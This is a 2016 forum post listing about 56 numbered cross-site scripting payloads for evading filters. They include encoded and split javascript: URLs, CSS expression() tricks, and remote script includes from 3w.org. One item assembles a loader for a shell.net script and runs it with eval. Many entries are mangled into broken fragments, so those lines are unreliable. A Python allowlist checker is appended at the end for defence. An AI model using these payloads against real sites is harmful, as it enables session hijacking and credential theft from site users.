XSS Attack Round-up

Original poster, posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..(omitted)..S')>

(9) 7-digit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..(omitted)..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Getting around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Doubled open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript with escape filtering
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC=\'#\'" /span>

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC=\'#\'" /span>

(35) IMG LOWSRC
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with URL link
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC=\'#\'" /IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
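A defender's check for the URL-attribute vectors in items 3 to 19 above, added here as an example and not part of the original post: a naive blocklist beside a normalize-then-allowlist scheme check, run over constructed sample values modelled on the list. All function names are hypothetical.

```python
import html
import re
from urllib.parse import urlsplit

# Characters a browser discards inside a URL before reading its scheme:
# the tab/newline/CR/NUL/leading-space tricks of items 11 to 19 above.
_CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")  # helper names here are hypothetical

def naive_blocklist_allows(value: str) -> bool:
    """The filter this list is written to defeat: a literal, case-sensitive
    search for 'javascript:' in the raw attribute value."""
    return "javascript:" not in value

def normalize_url(value: str) -> str:
    """Undo what a browser undoes before it interprets the scheme: HTML
    entities (decimal, hex, zero-padded, ';' optional), controls, case."""
    decoded = html.unescape(value)            # &#106; &#x6A; &#0000106 -> j
    return _CONTROL_CHARS.sub("", decoded).strip().lower()

def is_safe_url(value: str) -> bool:
    """Allowlist, not blocklist: only absolute http(s) URLs or a same-origin
    path pass; javascript:, vbscript:, data: and //host are rejected."""
    url = normalize_url(value)
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme in ("http", "https"):
        return parts.netloc != ""
    return parts.scheme == "" and not url.startswith("//")
def escape_text(value: str) -> str:
    """Output encoding for text/quoted-attribute contexts: this, not a URL
    check, is what defuses the tag-breaking payloads (items 6, 23, 30)."""
    return html.escape(value, quote=True)

# Constructed sample attribute values modelled on the list above.
SAMPLES = {
    "plain":    "javascript:alert('XSS')",                     # item 3
    "case":     "JaVaScRiPt:alert('XSS')",                     # item 4
    "entity":   "&#106;&#97;&#118;&#97;script:alert('XSS')",   # item 5
    "padded":   "&#0000106&#0000097vascript:alert('XSS')",     # item 9
    "tab":      "jav\tascript:alert('XSS')",                   # item 11
    "nul":      "java\0script:alert('XSS')",                   # item 17
    "benign":   "https://example.com/img.png",
    "relative": "/static/logo.png",
}

def evaluate(samples=SAMPLES):
    # Map each sample to (naive blocklist allows it, allowlist allows it).
    return {k: (naive_blocklist_allows(v), is_safe_url(v)) for k, v in samples.items()}
```

Every obfuscated variant slips past the blocklist and is caught by the allowlist, while the two benign values pass both.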